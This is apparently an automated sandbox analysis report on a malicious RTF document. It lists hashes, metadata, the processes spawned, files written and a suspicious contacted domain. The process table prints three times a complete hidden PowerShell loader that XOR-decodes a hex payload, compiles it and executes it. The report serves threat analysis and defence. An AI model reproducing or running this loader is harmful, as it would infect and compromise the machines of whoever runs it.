File name: | bl.doc |
Full analysis: | https://app.any.run/tasks/eb12ae70-76c8-431f-996a-becfae313e13 |
Verdict: | Malicious activity |
Analysis date: | September 18, 2019, 16:22:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 78688BAE2C3C047F7DCD000B436D470B |
SHA1: | EBA9507AA71BF5B729D8D1034D230E197DF2A155 |
SHA256: | 49EEF2FD867042AE3698CA02A8A9146E087E6C029AEDB607D538ECF3BF882467 |
SSDEEP: | 6144:ssvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvyS:vRRRRRRRRRRRRRRX |
.rtf | | | Rich Text Format (100) |
---|
Author: | Admin |
---|---|
LastModifiedBy: | Admin |
CreateDate: | 2019:01:07 23:54:00 |
ModifyDate: | 2019:01:07 23:54:00 |
RevisionNumber: | 1 |
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 4 |
CharactersWithSpaces: | 4 |
InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\bl.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4092 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3964 | powershell -WindowStyle Hidden function z8231d5 { param($bf6c7) $r8e13 = 'see5e9';$g7f11a7 = ''; for ($i = 0; $i -lt $bf6c7.length; $i+=2) { $qbbf6 = [convert]::ToByte($bf6c7.Substring($i, 2), 16); $g7f11a7 += [char]($qbbf6 -bxor $r8e13[($i / 2) % $r8e13.length]); } return $g7f11a7; } $z6586d5 = '06160c5b0219201c164100544810165c0b5e53361c46115c1e4b37400b4d1a08001b2c570700175a156a1617135c065c005e10460c571445364c164d16084b710c58140b0a46115010165e4016501d0245661c4a0700081b2c764810165c0b5e53361c46115c1e4b2b5011027e6f154007551a064556095800164552525d4a5300011e623709097c08491c17111d475216170b50090a414749700b4d011c355a0c5707584772004d23170a56245d17170046161b5a384545105b1f0c0615164d12110c56455c0b1100470b193a0b1165114b53020700005b5b2c0b41354d01450006060f16004946114b1a0b02151d0b120607004c02282109592c54030a17414d1b1800175b005540574719457c1d11174c35561a0b1115581951290a5401751a0717541740514c3815154c11090c56454a0704115c0619161d11501757532c0b41354d01451706575a4a074d46114b1a0b02151d0f4b03541c5e623709097c08491c17111d475216170b50090a41474915205707171c650a501d1158173350011110540969010a1150064d514c3815154c11090c56454a0704115c0619161d1150175753070a5a091900545650570a5b2c0b41354d01451201070d4504571930701d1135411719055c06005c1553100c5b1119020401020415530a1041454c1a0b1115005a445603540010483e215909701e150a471111512e00470b5c1f56571b01551f474915205707171c650a501d115817374d1f280a43007416080a471c1b5f453650117512161170174b1c175853045500004c68454a0704115c0619161d1150175753130a5c01191b52045706113a0b1165114b5303575100015f2c0b41354d0145000c570b4a00495c0b4d5313540652085a5e154007551a0645461158070c06150c57074508505d0846034d1c1e701d11354117190154500d56194e451706575a4a074d4f5d0b405401004d1b4257550d540f46065157505d4203550c47105a5e0c534d4b42505d0658043a0b1165114b5d3f00470a1008020a410a1901520401035a445e187c0b4d23111715080c105c5c0104041407505007110154500d5615095d5706545d464d470657094b545300060a45500404570911575201550940500304530844474c1c5e50154d080006004a51040858701d11354117172900175a4c42140a115a454b44045153060e4818307c0b4d23111715000e1256045301045b302c5b116907174c005e4c1a0b1115020f400053005809480c031d444a4256000756111e50060c5c0d12490002040a1203011955414755495a104d53025306000f464c4c4e0256070a45475258470306025e44311c11503e64530e535153014b581e051d0a4249554d035f5f551d0c5544482c0b41354d01450d07500e44535878044b000d04594b781f090a562d7e1f0a07540911404c5e78044b000d04594b7a1c151c1d0e0f17535d0d49095f0d5700520e4549561c5e51440407564d571612457c0b4d2311171d080c105c5c010417270a2c5b110f474d4c1e5541435554574c151b575002520f5f564c0e170e1251035652035332005726551a000b414541105d0156560b4e0b0042456e160726590c5c1d114d1c5e4a07170c5b02191c015c565c0d4e200b430c4b1c0b08500b4d5d22004123561f0100473558070d4d700b4f1a170a5b085c1d114b66155c100c045923561f0100474b780315095c0658070c0a5b215807044c1e47652f1f5c03565c514e1f0d570a4201501d470c17555504010c43474c0e1d5a4b0106065717370a125b09561201235c095c5b1f5d07560817504d17545b42545404510c46035403505a43535554505b42565157540d43045405500f43015003545d470755035058435d5403545c43005154500143005402540f4201550547105f0a010c0600474c5e65175610001646364d1217117c0b5f1c4508565101465256080b5c044535470a5a16161666115801112c5b03565b0a010c0600474c5e651756100016464b6a070417414d5410515d00520a5a5e1750114c010b45055e44031007590c5a5316115411501045164117501d02454f5d0b405401004d4a07170c5b02190156500d5310081611470c5714450006060f16005817165c1650000c47020011175c0b5e5317560706001158364117501d024b700849071c5e530a4b5b0c0b4145504e555e5c594b40505d034b75160b02410d021a4e58074c42111c1150455e11500057587a1c0b1350174d5d310a771c4d164d17065001454b3640074a07170c5b02111a49571c4908454c5e47560b105c071e5811100d04474c111407505007192d450006060f16003e1d0c16414c4510455c4006535000173f000b5211512e4c5e48175c0710175b454b4057060c07020e18'; $z6586d52 = z8231d5($z6586d5); Add-Type -TypeDefinition $z6586d52; [g7d96e4]::me815f(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3692 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3932 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\zmtnevhr.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3992 | powershell -WindowStyle Hidden function z8231d5 { param($bf6c7) $r8e13 = 'see5e9';$g7f11a7 = ''; for ($i = 0; $i -lt $bf6c7.length; $i+=2) { $qbbf6 = [convert]::ToByte($bf6c7.Substring($i, 2), 16); $g7f11a7 += [char]($qbbf6 -bxor $r8e13[($i / 2) % $r8e13.length]); } return $g7f11a7; } $z6586d5 = '06160c5b0219201c164100544810165c0b5e53361c46115c1e4b37400b4d1a08001b2c570700175a156a1617135c065c005e10460c571445364c164d16084b710c58140b0a46115010165e4016501d0245661c4a0700081b2c764810165c0b5e53361c46115c1e4b2b5011027e6f154007551a064556095800164552525d4a5300011e623709097c08491c17111d475216170b50090a414749700b4d011c355a0c5707584772004d23170a56245d17170046161b5a384545105b1f0c0615164d12110c56455c0b1100470b193a0b1165114b53020700005b5b2c0b41354d01450006060f16004946114b1a0b02151d0b120607004c02282109592c54030a17414d1b1800175b005540574719457c1d11174c35561a0b1115581951290a5401751a0717541740514c3815154c11090c56454a0704115c0619161d11501757532c0b41354d01451706575a4a074d46114b1a0b02151d0f4b03541c5e623709097c08491c17111d475216170b50090a41474915205707171c650a501d1158173350011110540969010a1150064d514c3815154c11090c56454a0704115c0619161d1150175753070a5a091900545650570a5b2c0b41354d01451201070d4504571930701d1135411719055c06005c1553100c5b1119020401020415530a1041454c1a0b1115005a445603540010483e215909701e150a471111512e00470b5c1f56571b01551f474915205707171c650a501d115817374d1f280a43007416080a471c1b5f453650117512161170174b1c175853045500004c68454a0704115c0619161d1150175753130a5c01191b52045706113a0b1165114b5303575100015f2c0b41354d0145000c570b4a00495c0b4d5313540652085a5e154007551a0645461158070c06150c57074508505d0846034d1c1e701d11354117190154500d56194e451706575a4a074d4f5d0b405401004d1b4257550d540f46065157505d4203550c47105a5e0c534d4b42505d0658043a0b1165114b5d3f00470a1008020a410a1901520401035a445e187c0b4d23111715080c105c5c0104041407505007110154500d5615095d5706545d464d470657094b545300060a45500404570911575201550940500304530844474c1c5e50154d080006004a51040858701d11354117172900175a4c42140a115a454b44045153060e4818307c0b4d23111715000e1256045301045b302c5b116907174c005e4c1a0b1115020f400053005809480c031d444a4256000756111e50060c5c0d12490002040a1203011955414755495a104d53025306000f464c4c4e0256070a45475258470306025e44311c11503e64530e535153014b581e051d0a4249554d035f5f551d0c5544482c0b41354d01450d07500e44535878044b000d04594b781f090a562d7e1f0a07540911404c5e78044b000d04594b7a1c151c1d0e0f17535d0d49095f0d5700520e4549561c5e51440407564d571612457c0b4d2311171d080c105c5c010417270a2c5b110f474d4c1e5541435554574c151b575002520f5f564c0e170e1251035652035332005726551a000b414541105d0156560b4e0b0042456e160726590c5c1d114d1c5e4a07170c5b02191c015c565c0d4e200b430c4b1c0b08500b4d5d22004123561f0100473558070d4d700b4f1a170a5b085c1d114b66155c100c045923561f0100474b780315095c0658070c0a5b215807044c1e47652f1f5c03565c514e1f0d570a4201501d470c17555504010c43474c0e1d5a4b0106065717370a125b09561201235c095c5b1f5d07560817504d17545b42545404510c46035403505a43535554505b42565157540d43045405500f43015003545d470755035058435d5403545c43005154500143005402540f4201550547105f0a010c0600474c5e65175610001646364d1217117c0b5f1c4508565101465256080b5c044535470a5a16161666115801112c5b03565b0a010c0600474c5e651756100016464b6a070417414d5410515d00520a5a5e1750114c010b45055e44031007590c5a5316115411501045164117501d02454f5d0b405401004d4a07170c5b02190156500d5310081611470c5714450006060f16005817165c1650000c47020011175c0b5e5317560706001158364117501d024b700849071c5e530a4b5b0c0b4145504e555e5c594b40505d034b75160b02410d021a4e58074c42111c1150455e11500057587a1c0b1350174d5d310a771c4d164d17065001454b3640074a07170c5b02111a49571c4908454c5e47560b105c071e5811100d04474c111407505007192d450006060f16003e1d0c16414c4510455c4006535000173f000b5211512e4c5e48175c0710175b454b4057060c07020e18'; $z6586d52 = z8231d5($z6586d5); Add-Type -TypeDefinition $z6586d52; [g7d96e4]::me815f(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1188 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3688 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESB58A.tmp" "c:\Users\admin\AppData\Local\Temp\CSCB589.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3768 | powershell -WindowStyle Hidden function z8231d5 { param($bf6c7) $r8e13 = 'see5e9';$g7f11a7 = ''; for ($i = 0; $i -lt $bf6c7.length; $i+=2) { $qbbf6 = [convert]::ToByte($bf6c7.Substring($i, 2), 16); $g7f11a7 += [char]($qbbf6 -bxor $r8e13[($i / 2) % $r8e13.length]); } return $g7f11a7; } $z6586d5 = '06160c5b0219201c164100544810165c0b5e53361c46115c1e4b37400b4d1a08001b2c570700175a156a1617135c065c005e10460c571445364c164d16084b710c58140b0a46115010165e4016501d0245661c4a0700081b2c764810165c0b5e53361c46115c1e4b2b5011027e6f154007551a064556095800164552525d4a5300011e623709097c08491c17111d475216170b50090a414749700b4d011c355a0c5707584772004d23170a56245d17170046161b5a384545105b1f0c0615164d12110c56455c0b1100470b193a0b1165114b53020700005b5b2c0b41354d01450006060f16004946114b1a0b02151d0b120607004c02282109592c54030a17414d1b1800175b005540574719457c1d11174c35561a0b1115581951290a5401751a0717541740514c3815154c11090c56454a0704115c0619161d11501757532c0b41354d01451706575a4a074d46114b1a0b02151d0f4b03541c5e623709097c08491c17111d475216170b50090a41474915205707171c650a501d1158173350011110540969010a1150064d514c3815154c11090c56454a0704115c0619161d1150175753070a5a091900545650570a5b2c0b41354d01451201070d4504571930701d1135411719055c06005c1553100c5b1119020401020415530a1041454c1a0b1115005a445603540010483e215909701e150a471111512e00470b5c1f56571b01551f474915205707171c650a501d115817374d1f280a43007416080a471c1b5f453650117512161170174b1c175853045500004c68454a0704115c0619161d1150175753130a5c01191b52045706113a0b1165114b5303575100015f2c0b41354d0145000c570b4a00495c0b4d5313540652085a5e154007551a0645461158070c06150c57074508505d0846034d1c1e701d11354117190154500d56194e451706575a4a074d4f5d0b405401004d1b4257550d540f46065157505d4203550c47105a5e0c534d4b42505d0658043a0b1165114b5d3f00470a1008020a410a1901520401035a445e187c0b4d23111715080c105c5c0104041407505007110154500d5615095d5706545d464d470657094b545300060a45500404570911575201550940500304530844474c1c5e50154d080006004a51040858701d11354117172900175a4c42140a115a454b44045153060e4818307c0b4d23111715000e1256045301045b302c5b116907174c005e4c1a0b1115020f400053005809480c031d444a4256000756111e50060c5c0d12490002040a1203011955414755495a104d53025306000f464c4c4e0256070a45475258470306025e44311c11503e64530e535153014b581e051d0a4249554d035f5f551d0c5544482c0b41354d01450d07500e44535878044b000d04594b781f090a562d7e1f0a07540911404c5e78044b000d04594b7a1c151c1d0e0f17535d0d49095f0d5700520e4549561c5e51440407564d571612457c0b4d2311171d080c105c5c010417270a2c5b110f474d4c1e5541435554574c151b575002520f5f564c0e170e1251035652035332005726551a000b414541105d0156560b4e0b0042456e160726590c5c1d114d1c5e4a07170c5b02191c015c565c0d4e200b430c4b1c0b08500b4d5d22004123561f0100473558070d4d700b4f1a170a5b085c1d114b66155c100c045923561f0100474b780315095c0658070c0a5b215807044c1e47652f1f5c03565c514e1f0d570a4201501d470c17555504010c43474c0e1d5a4b0106065717370a125b09561201235c095c5b1f5d07560817504d17545b42545404510c46035403505a43535554505b42565157540d43045405500f43015003545d470755035058435d5403545c43005154500143005402540f4201550547105f0a010c0600474c5e65175610001646364d1217117c0b5f1c4508565101465256080b5c044535470a5a16161666115801112c5b03565b0a010c0600474c5e651756100016464b6a070417414d5410515d00520a5a5e1750114c010b45055e44031007590c5a5316115411501045164117501d02454f5d0b405401004d4a07170c5b02190156500d5310081611470c5714450006060f16005817165c1650000c47020011175c0b5e5317560706001158364117501d024b700849071c5e530a4b5b0c0b4145504e555e5c594b40505d034b75160b02410d021a4e58074c42111c1150455e11500057587a1c0b1350174d5d310a771c4d164d17065001454b3640074a07170c5b02111a49571c4908454c5e47560b105c071e5811100d04474c111407505007192d450006060f16003e1d0c16414c4510455c4006535000173f000b5211512e4c5e48175c0710175b454b4057060c07020e18'; $z6586d52 = z8231d5($z6586d5); Add-Type -TypeDefinition $z6586d52; [g7d96e4]::me815f(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3744 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9F32.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4092 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA8F6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3692 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB069.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3964 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BE9FWJZXLCWDBKERB61G.temp | — | |
MD5:— | SHA256:— | |||
1188 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB4DD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3932 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCB589.tmp | — | |
MD5:— | SHA256:— | |||
3688 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB58A.tmp | — | |
MD5:— | SHA256:— | |||
3932 | csc.exe | C:\Users\admin\AppData\Local\Temp\zmtnevhr.out | — | |
MD5:— | SHA256:— | |||
3992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SZD4R9OMCPROTEANQLUF.temp | — | |
MD5:— | SHA256:— | |||
3744 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB9FE.tmp.cvr | — | |
MD5:— | SHA256:— |
Domain | IP | Reputation |
---|---|---|
convrgouchon.com |
| suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ |
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|